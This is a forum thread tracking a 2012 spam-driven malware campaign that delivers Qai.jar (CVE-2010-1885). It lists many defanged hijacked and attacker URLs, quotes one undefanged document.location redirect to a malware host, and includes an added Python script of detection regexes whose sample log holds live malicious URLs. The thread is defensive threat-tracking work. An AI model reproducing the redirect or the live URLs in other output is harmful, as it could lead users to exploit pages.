Qai.jar malware (CVE-2010-1885)
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
Qai.jar malware (CVE-2010-1885)
A well-known spam expert is reporting an aggressively promoted malware exploit which uses multiple sites together. Deceptive web pages planted on dozens of sites load a set of JavaScripts which in turn attempt to load a malicious webpage. Several variations were detected yesterday and today.
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://finantariauto.ro/5ZqETXNE/js.js
hXXp://ipecturkey.com/E2UNfoGY/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempt to load
hXXp://209.59.217.193/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://209.59.217.193/q.php?f=ba33
hXXp://209.59.217.193/content/Qai.jar
This set of scripts
hXXp://216.205.49.67/CD5s3Ne3/js.js
hXXp://activetours.pttk.pl/Eaz0Mz8g/js.js
hXXp://copymax.gr/jbbaaFCK/js.js
hXXp://offvip.com/TtMQy1sw/js.js
hXXp://solocyberday.com/oDYibUuh/js.js
attempt to load
hXXp://slickicus.com/showthread.php?t=8d80b8c3f87a9538
that leads to malware at
hXXp://slickicus.com/q.php?f=db757
hXXp://slickicus.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://qqprints.com.my/37ErBpvj/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempt to load
hXXp://slicksphere.com/showthread.php?t=d7ad916d1c0396ff
but the domain slicksphere.com has been suspended
Here are some of the deceptive URLs that have been reported earlier today
hXXp://02f40c1.netsolhost.com/jXh3opQk/index.html
hXXp://02f40c1.netsolhost.com/pVXky4P3/index.html
hXXp://184.164.129.5/H0PL9q26/index.html
hXXp://3eras.com/0X98aHUS/index.html
hXXp://5seis.com.ar/jXh3opQk/index.html
hXXp://91.93.110.150/JYjJE2q2/index.html
hXXp://acriancafeliz.org.br/vyEryYcH/index.html
hXXp://advanced-web-hosting-solutions.com/H0PL9q26/index.html
hXXp://advancedcopier.net/tMYwdbsB/index.html
hXXp://aerospacend.com/0X98aHUS/index.html
hXXp://autolorentzos.gr/46iU2yx2/index.html
hXXp://autolorentzos.gr/k4H1CSBf/index.html
hXXp://autouniversal.ro/tMYwdbsB/index.html
hXXp://bestdeal.com.vn/H0PL9q26/index.html
hXXp://binhanphat.vn/pVXky4P3/index.html
hXXp://chinchunhoo.com/tp3G2sKH/index.html
hXXp://criadero-duancos.com.ar/jXh3opQk/index.html
hXXp://dhtics.webou.net/8pe5eCMZ/index.html
hXXp://dhtics.webou.net/N7hwdmet/index.html
hXXp://dhtics.webou.net/vyEryYcH/index.html
hXXp://fundoohairstyles.com/0X98aHUS/index.html
hXXp://getstrength.com/pVXky4P3/index.html
hXXp://glamourspa.com.vn/H0PL9q26/index.html
hXXp://goksen.com.tr/H0PL9q26/index.html
hXXp://goksen.com.tr/JYjJE2q2/index.html
hXXp://goksen.com.tr/tp3G2sKH/index.html
hXXp://hajashaza.hu/JYjJE2q2/index.html
hXXp://hajashaza.hu/pVXky4P3/index.html
hXXp://hajashaza.hu/W9x9Xomw/index.html
hXXp://hellenic-antiaging-academy.gr/k4H1CSBf/index.html
hXXp://hidroprojekt-consult.hr/W9x9Xomw/index.html
hXXp://hippocrafts.com/46iU2yx2/index.html
hXXp://hippocrafts.com/8pe5eCMZ/index.html
hXXp://hippocrafts.com/svaVeSkm/index.html
hXXp://hyperbeesmedia.com/svaVeSkm/index.html
hXXp://ibafo.com.br/LTWJaNR9/index.html
hXXp://ibafo.com.br/N7hwdmet/index.html
hXXp://inour.biz/JYjJE2q2/index.html
hXXp://inour.biz/pVXky4P3/index.html
hXXp://isravilon1.com/tMYwdbsB/index.html
hXXp://junglecreativestudio.gr/k4H1CSBf/index.html
hXXp://jurjev.com/8pe5eCMZ/index.html
hXXp://koala.unas.cz/N7hwdmet/index.html
hXXp://kolling.com.my/LTWJaNR9/index.html
hXXp://kongo.co.hu/N7hwdmet/index.html
hXXp://kongo.co.hu/svaVeSkm/index.html
hXXp://kongo.co.hu/tMYwdbsB/index.html
hXXp://laflcargo.com/vyEryYcH/index.html
hXXp://laleyurtseven.com/8pe5eCMZ/index.html
hXXp://laleyurtseven.com/tMYwdbsB/index.html
hXXp://ledsociety.com/7ik7M03n/index.html
hXXp://ledsociety.com/tp3G2sKH/index.html
hXXp://leikar.net/vyEryYcH/index.html
hXXp://linemenu.com/8pe5eCMZ/index.html
hXXp://linemenu.com/svaVeSkm/index.html
hXXp://littlelordspreschool.com/0X98aHUS/index.html
hXXp://lsquarednetworks.com/7ik7M03n/index.html
hXXp://lsquarednetworks.com/tp3G2sKH/index.html
hXXp://mage.ibraggiotti.com/0X98aHUS/index.html
hXXp://mage.ibraggiotti.com/W9x9Xomw/index.html
hXXp://magneticlodestone.com/46iU2yx2/index.html
hXXp://magneticlodestone.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/svaVeSkm/index.html
hXXp://mayerdobrasil.com.br/W9x9Xomw/index.html
hXXp://mcms.xs2theworld.com/LTWJaNR9/index.html
hXXp://mcms.xs2theworld.com/vyEryYcH/index.html
hXXp://metrofincaraiz.com/0X98aHUS/index.html
hXXp://minds.com.pk/8pe5eCMZ/index.html
hXXp://mishelart.com/tp3G2sKH/index.html
hXXp://mixtle.com/tMYwdbsB/index.html
hXXp://mkultura.lt/7ik7M03n/index.html
hXXp://musicalchemylab.lh.pl/46iU2yx2/index.html
hXXp://myghanaonline.com/N7hwdmet/index.html
hXXp://notebooktamiri.gen.tr/vyEryYcH/index.html
hXXp://objebi.com/xBu5dukk/index.html
hXXp://olla-de-felix-buenos-aires.com/Qyuv8XX1/index.html
hXXp://olla-de-felix-buenos-aires.com/xBu5dukk/index.html
hXXp://oneblr.com/a65oSoKL/index.html
hXXp://optimizacija-seo.com/a65oSoKL/index.html
hXXp://overhill.comicgenesis.com/xBu5dukk/index.html
hXXp://paperbuzz.net/3BvC2cTf/index.html
hXXp://party-chat.hu/a65oSoKL/index.html
hXXp://party-chat.hu/xBu5dukk/index.html
hXXp://povilasc.ipower.com/tp3G2sKH/index.html
hXXp://pp.premiumpage.pl/vyEryYcH/index.html
hXXp://Privatesandbox.com/qVsVjYfe/index.html
hXXp://prodmovie.com/xBu5dukk/index.html
hXXp://psytrip.com.br/LTWJaNR9/index.html
hXXp://public.smartbe.be/0X98aHUS/index.html
hXXp://rajtr.com/7ik7M03n/index.html
hXXp://realestatebootcamp.ca/LTWJaNR9/index.html
hXXp://redencionsofro.com.ar/3BvC2cTf/index.html
hXXp://revivalgospelministries.org/LTWJaNR9/index.html
hXXp://riwex.hu/3BvC2cTf/index.html
hXXp://sarahyong.com/CzEjfCRK/index.html
hXXp://sereflikochisarzob.org/LTWJaNR9/index.html
hXXp://sezam.home.pl/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/CzEjfCRK/index.html
hXXp://silentstartupwebsite.com/xBu5dukk/index.html
hXXp://siranmuftulugu.gov.tr/46iU2yx2/index.html
hXXp://sisrs.org/tMYwdbsB/index.html
hXXp://sixdimensions.co.id/xBu5dukk/index.html
hXXp://softwarepark-galati.ro/xBu5dukk/index.html
hXXp://swcc.marknetdev.com/LTWJaNR9/index.html
hXXp://sxs-bwn.org/vyEryYcH/index.html
hXXp://techleadsolution.com/QnXBRiWS/index.html
hXXp://tehranmaltbeer.com/30VtVqEf/index.html
hXXp://tempo-www.defisduchott.com/CzEjfCRK/index.html
hXXp://themainmall.com/svaVeSkm/index.html
hXXp://transcamila.com/tMYwdbsB/index.html
hXXp://upedagogica.edu.bo/N7hwdmet/index.html
hXXp://www.tesan.com.tr/vyEryYcH/index.html
Some other reported URLs return HTTP 404 ("Not Found") or their domains have been suspended, so I suspect efforts are underway to combat the malware campaign.
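The post above describes a four-stage chain (hijacked host /<8 chars>/index.html, hijacked host /<8 chars>/js.js, attacker host /showthread.php?t=<16 hex>, then /content/Qai.jar and /q.php?f=<hex>), and a later reply shows the intermediary script is a one-line document.location redirect. The script below is an added example, not code from the thread or its authors: it classifies URLs into those stages, pulls redirect targets out of a js.js body, and reconstructs per-client chains from proxy log lines. The log format, the client addresses, the timestamps and the example.org/example.com hosts are constructed for the example; only the URL shapes come from the thread.

```python
"""Reconstruct the Qai.jar redirect chain from web proxy logs.

Added example, not code from the original thread. It encodes the URL
shape the posts describe:
  hijacked host  /<8 alnum chars>/index.html          (landing page)
  hijacked host  /<8 alnum chars>/js.js               (intermediary script)
  attacker host  /showthread.php?t=<16 hex chars>     (redirect target)
  attacker host  /content/Qai.jar, /q.php?f=<hex>     (payload)
The log lines and client IPs below are constructed for the example.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

STAGES = [
    ("landing",      re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")),
    ("intermediary", re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")),
    ("redirect",     re.compile(r"^/showthread\.php$")),
    ("payload",      re.compile(r"^/(content/Qai\.jar|q\.php|content/ap2\.php)$")),
]
STAGE_ORDER = {name: i for i, (name, _) in enumerate(STAGES)}

# Form seen in the thread: document.location='http://.../showthread.php?t=...';
REDIRECT_RX = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")

# Constructed log format: <timestamp> <client> <method> <url> <status>
LOG_RX = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def classify(url):
    """Return the chain stage a URL belongs to, or None if it matches none.

    The landing and intermediary shapes are generic enough to hit benign
    sites, so the redirect and payload stages also check their query
    parameters (t = 16 hex chars, f = hex) before matching.
    """
    p = urlparse(url)
    for stage, rx in STAGES:
        if not rx.match(p.path):
            continue
        qs = parse_qs(p.query)
        if stage == "redirect":
            if not re.fullmatch(r"[0-9a-f]{16}", qs.get("t", [""])[0]):
                return None
        elif stage == "payload" and p.path != "/content/Qai.jar":
            if not re.fullmatch(r"[0-9a-f]+", qs.get("f", [""])[0]):
                return None
        return stage
    return None


def extract_redirects(js_source):
    """Pull document.location targets out of a fetched js.js body."""
    return REDIRECT_RX.findall(js_source)


def reconstruct_chains(log_text):
    """Group matching requests per client, ordered by stage then time.

    Returns {client: {"stages": [...], "urls": [...], "confirmed": bool}}.
    A chain counts as confirmed only once the redirect or payload stage
    is seen; a lone /<8 chars>/index.html hit is not enough to alert on.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RX.match(line)
        if not m:
            continue
        ts, client, _method, url, status = m.groups()
        stage = classify(url)
        if stage is not None:
            hits[client].append((STAGE_ORDER[stage], ts, stage, url, status))
    chains = {}
    for client, rows in hits.items():
        rows.sort()
        stages = [r[2] for r in rows]
        chains[client] = {
            "stages": stages,
            "urls": [r[3] for r in rows],
            "confirmed": any(s in ("redirect", "payload") for s in stages),
        }
    return chains


# Constructed sample: one full chain, one lone landing hit, one benign request.
SAMPLE_LOG = """\
2012-03-23T10:01:02Z 10.0.0.5 GET http://3eras.com/0X98aHUS/index.html 200
2012-03-23T10:01:03Z 10.0.0.5 GET http://oompa.de/VTwQKwDD/js.js 200
2012-03-23T10:01:03Z 10.0.0.5 GET http://finantariauto.ro/5ZqETXNE/js.js 404
2012-03-23T10:01:04Z 10.0.0.5 GET http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff 200
2012-03-23T10:01:06Z 10.0.0.5 GET http://slickcurve.com/content/Qai.jar 200
2012-03-23T10:01:07Z 10.0.0.5 GET http://slickcurve.com/q.php?f=ba33 200
2012-03-23T10:02:00Z 10.0.0.9 GET http://example.org/ABCDEFGH/index.html 200
2012-03-23T10:05:00Z 10.0.0.7 GET http://www.example.com/news/index.html 200
"""

if __name__ == "__main__":
    for client, chain in reconstruct_chains(SAMPLE_LOG).items():
        flag = "CONFIRMED" if chain["confirmed"] else "weak"
        print(f"{client}: {flag:9} {' -> '.join(chain['stages'])}")
```

The design point is in `confirmed`: an 8-character directory plus index.html or js.js also occurs on legitimate sites, so only the showthread.php?t=<16 hex> request or a /content/Qai.jar, /q.php?f= or /content/ap2.php?f= fetch should raise an alert; the earlier stages are kept for reconstructing which hijacked hosts delivered the client there.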
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Other people are also reporting virtually the same exploit which is also running on other sites.
This set of scripts
hXXp://50.57.29.172/hVg3GFAo/js.js
hXXp://oompa.de/VTwQKwDD/js.js
attempts to load
hXXp://matormaster.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://matormaster.com/q.php?f=ba33e
hXXp://matormaster.com/content/Qai.jar
This set of scripts
hXXp://officefurnituremart.com/sT1SFMyf/js.js
hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
hXXp://romanjewelers.com/mnbCaEYY/js.js
hXXp://samx.zzl.org/crF5iYsT/js.js
attempts to load
hXXp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://slickcurve.com/q.php?f=ba33
hXXp://slickcurve.com/content/Qai.jar
Here are some of the deceptive URLs that have been reported within the past few hours
hXXp://clubrepublique.com/LTWJaNR9/index.html
hXXp://gfclock.com/tMYwdbsB/index.html
hXXp://maxiesolutions.com/N7hwdmet/index.html
hXXp://orangesoft.co.uk/xBu5dukk/index.html
hXXp://palm-schools.com/xBu5dukk/index.html
hXXp://paperbuzz.net/xBu5dukk/index.html
hXXp://parfum-mester.hu/a65oSoKL/index.html
hXXp://parfum-sziget.hu/a65oSoKL/index.html
hXXp://party-chat.hu/3BvC2cTf/index.html
hXXp://photo-howto.com/a65oSoKL/index.html
hXXp://popi-indonesia.org/Qyuv8XX1/index.html
hXXp://probatik.com/3BvC2cTf/index.html
hXXp://psytrip.com.br/8pe5eCMZ/index.html
hXXp://riwex.hu/30VtVqEf/index.html
hXXp://riwex.hu/a65oSoKL/index.html
hXXp://saturnosistemas.com/xBu5dukk/index.html
hXXp://sezam.home.pl/a65oSoKL/index.html
hXXp://silentstartupwebsite.com/a65oSoKL/index.html
hXXp://sinarled.com/CzEjfCRK/index.html
hXXp://sreesaiproperty.com/CzEjfCRK/index.html
hXXp://szomaliaiegyesulet.hu/30VtVqEf/index.html
hXXp://tamanbungaku.com/a65oSoKL/index.html
hXXp://tanyaeco.co.za/30VtVqEf/index.html
hXXp://terangkecil.com/3BvC2cTf/index.html
hXXp://thechange180.com/a65oSoKL/index.html
RE: Qai.jar malware (CVE-2010-1885)
Qai.jar - 17.07 KB
VT 0/43: https://www.virustotal.com/file/dfd851768ad579fe0dddff9f1d88305f066d7313bd09cdbfd0122e93da379fab/analysis/
contents:
ua.class - 1.04 KB
cons.class - 4.27 KB
cr.class - 2.3 KB
G.class - 3.35 KB
ub.class - 15.63 KB
uc.class - 389 Byte
sys.class - 313 Byte
results with 404 not found:
matormaster.com/content/Qai.jar
matormaster.com/q.php?f=ba33e
50.57.29.172/hVg3GFAo/js.js
oompa.de/VTwQKwDD/js.js
officefurnituremart.com/sT1SFMyf/js.js
orvosokafrikaert.hu/Bsz1CQg0/js.js
romanjewelers.com/mnbCaEYY/js.js
samx.zzl.org/crF5iYsT/js.js
results with:
document.location='http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff';
slickcurve.com resides on IP 173.255.195.167
hXXp://173.255.195.167/showthread.php?t=d7ad916d1c0396ff
results with same malware install:
50.57.29.172
173.255.195.167
oompa.de
officefurnituremart.com
orvosokafrikaert.hu
romanjewelers.com
samx.zzl.org
slickcurve.com
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Spam email, transmitted via IP 82.127.14.217 (abo.wanadoo.fr), fraudulently claims to be a LinkedIn notice. IP 82.127.14.217 may be blacklisted. The email contains a deceptive URL to a webpage at
hXXp://butelii-acetilena.ro/59N0J8h1/index.html
which attempts to load JavaScript from two sources
hXXp://interspeedy.com.br/zjSxmkDM/js.js
hXXp://limbongan.com/37hcGs54/js.js
The scripts, in turn, attempt to redirect to a malicious web page at
hXXp://bluecellular.com/showthread.php?t=977334ca118fcb8c
that leads to malware at
hXXp://bluecellular.com/content/Qai.jar
hXXp://bluecellular.com/q.php?f=2e457
The email contains two more suspicious URLs, which are either fakes or have already been disabled (HTTP 404):
http://inepalhotels.com/y7id9XXo/index.html
http://cgwood.net/U6PcaTcQ/index.html
[Edit: more]
Other malicious scripts that redirect to bluecellular.com are at
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
bluecellular.com has been suspended; its domain registrar has set its status to clientHold. The malware exploit is now using the newly registered browncellular.com instead.
hXXp://174.133.92.122/MgGsg1Pp/js.js
hXXp://myparacord.com/cxW8X8xp/js.js
hXXp://prace.kupbilet.com/VTDeZmRF/js.js
hXXp://smapit.com/TaTj4D3f/js.js
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
hXXp://www.inkontro.com/CXxLMToy/js.js
hXXp://www.inkontro.it/9e85Bru8/js.js
hXXp://www.teodo-tivat.com/osJYHU6u/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
attempt to redirect to a malicious web page at
hXXp://browncellular.com/showthread.php?t=d7ad916d1c0396ff
that leads to malware at
hXXp://browncellular.com/content/Qai.jar
hXXp://browncellular.com/content/ap2.php?f=7245d
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Deceptive URLs at
hXXp://espacoquatro.com.br/3qZfYFbh/index.html
hXXp://sauschamber.com/sgc1MBef/index.html
load scripts from some or all of the following sources
hXXp://skueez.com/jKtfRnuL/js.js
hXXp://nhb.prosixsoftron.in/cJHrkMSb/js.js
hXXp://boemelparty.be/vnB4GozT/js.js
hXXp://www.alpine-turkey.com/YfTXsaR5/js.js
hXXp://sas.hg.pl/Th5Da66c/js.js
hXXp://www.vinhthanh.com.vn/8cACpVEr/js.js
that attempt to redirect to a malicious web page at
hXXp://cyancellular.com/showthread.php?t=d44175c6da768b70
that, in turn, leads to malware at
hXXp://cyancellular.com/content/Qai.jar
hXXp://cyancellular.com/q.php?f=44c23
Acknowledgement: I saw most of the URLs listed in this comment in the current malwaredomainlist.com report.
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
A deceptive URL at
hXXp://www.kozmodisk.net/enzfjWNu/index.html
loads scripts from all of the following sources
hXXp://auto-escolas.com/TfFQ7r6J/js.js
hXXp://muttonheadcollective.com/XvLBzokA/js.js
hXXp://rgexcel.com/CPD4MoEs/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://vita-shop.hu/dSSjc0ag/js.js
hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
that attempt to redirect to a malicious web page at
hXXp://purplecellular.org/showthread.php?t=d7ad916d1c0396ff
that leads to a suspicious file at
hXXp://purplecellular.org/content/Qai.jar
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
Currently, many of the malware exploit's intermediary JavaScript files, including these
hXXp://thebestguide1.com/arKwG4pE/js.js
hXXp://www.extrhema.com.br/cVspcegd/js.js
hXXp://mrsmakeit.com/9jrgDjED/js.js
redirect to a malicious webpage at
hXXp://whitecellular.org/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
hXXp://whitecellular.org/content/Qai.jar
RE: Qai.jar malware (CVE-2010-1885)
From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8-character random string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)
futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
andif.com.br
damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
eventakustik.de
eurowire.it
aashirwad.com.hk
fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
izaz.com.br
hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
barcuta.ro
artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
ismailgunes.web.tr
gastrocomplexeu.pl
bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
wahbischool.com
kemerburgazfutbolokulu.com
gruppoenter.eu
dimac.com.ar
cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br
-
- Posts: 6582
- Joined: Fri Mar 11, 2011 6:21 pm
RE: Qai.jar malware (CVE-2010-1885)
hXXp://www.aiopgiovani.it/FoSxV9z1/index.html
loads scripts from all of the following sources
hXXp://www.bestcar.ee/0AfKWVDW/js.js
hXXp://turkwebalan.com/oUvuQ0b7/js.js
hXXp://www.unimoveis.net/jW57W6aZ/js.js
hXXp://uttonheadcollective.com/XvLBzokA/js.js
which redirect to a malicious webpage at
hXXp://azurecellular.com/showthread.php?t=d7ad916d1c0396ff
which leads to the suspicious file
hXXp://azurecellular.com/content/Qai.jar
Many of the scam sites hosting Qai.jar may be divided into two groups, based upon their creation date.
Creation Date: 13-mar-2012
slickcurve.com (clientHold)
slickicus.com (clientHold)
slickidian.com (clientHold)
slicksphere.com (clientHold)
slickvard.com (IP 74.91.120.189)
Creation Date: 22-mar-2012
azurecellular.com (IP 209.59.217.78)
bluecellular.com (clientHold)
browncellular.com (IP 174.140.168.207)
cyancellular.com (clientHold)
purplecellular.org (CLIENT HOLD)
whitecellular.org (CLIENT HOLD)